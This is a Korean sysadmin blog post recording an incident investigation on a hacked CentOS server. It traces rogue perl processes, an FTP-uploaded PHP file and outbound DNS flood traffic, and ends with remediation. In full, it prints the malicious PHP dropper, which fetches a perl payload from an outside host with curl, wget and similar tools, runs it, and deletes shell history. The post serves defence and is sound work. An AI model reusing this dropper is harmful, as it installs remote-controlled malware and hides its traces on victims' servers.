본문 바로가기
Linux

[CentOS] 해킹점검 - perl

Heartbleed 2016. 5. 12. 11:25


#pstree -ap

 구동중인 perl 스크립트 확인

|-perl,5675
|-perl,5686
|-perl,5701
|-perl,5708
|-perl,29091
|-perl,31046


lsof -p 5675

perl 5675 nobody mem REG 8,7 18080 544057 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
perl 5675 nobody mem REG 8,7 21424 544232 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so


>> /var/log/xferlog 5월8일 15:48분 shinsxxxfnv 계정으로 inder.php a 업로드 확인

Sun May 8 15:48:47 2016 2 172.93.98.2 4762 /public_html/finder.php a _ i r shinseonfnv ftp 0 * c




>> 최초 트래픽 유출시 덤프 요약

16:12:31.380091 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]

16:12:31.380121 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]

16:12:31.380147 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380171 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380196 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380222 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380247 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380273 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]


finder.php a 내용 

<?
$url='http://y.cyberunder.org/';
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
?>



>>  shinsxxxfnv 계정 패스워드 변경 & 삭제 

>>public_html/finder.php a 파일 격리조치

저작자표시

'Linux' 카테고리의 다른 글

tcpdump 사용예제  (0) 2016.08.31
[IPTABLES] 53번 포트 OUT바운드 포트 차단  (0) 2016.05.12
[CentOS] 해킹점검 내용 - eval  (0) 2016.05.12
[CentOs6.x] portsentry-1.0 설치 및 테스트  (0) 2016.03.28
[CentOs 6.x] ssh_exchange_identification: read: Connection reset by peer 에러  (1) 2016.03.04

'Linux' Related Articles

티스토리툴바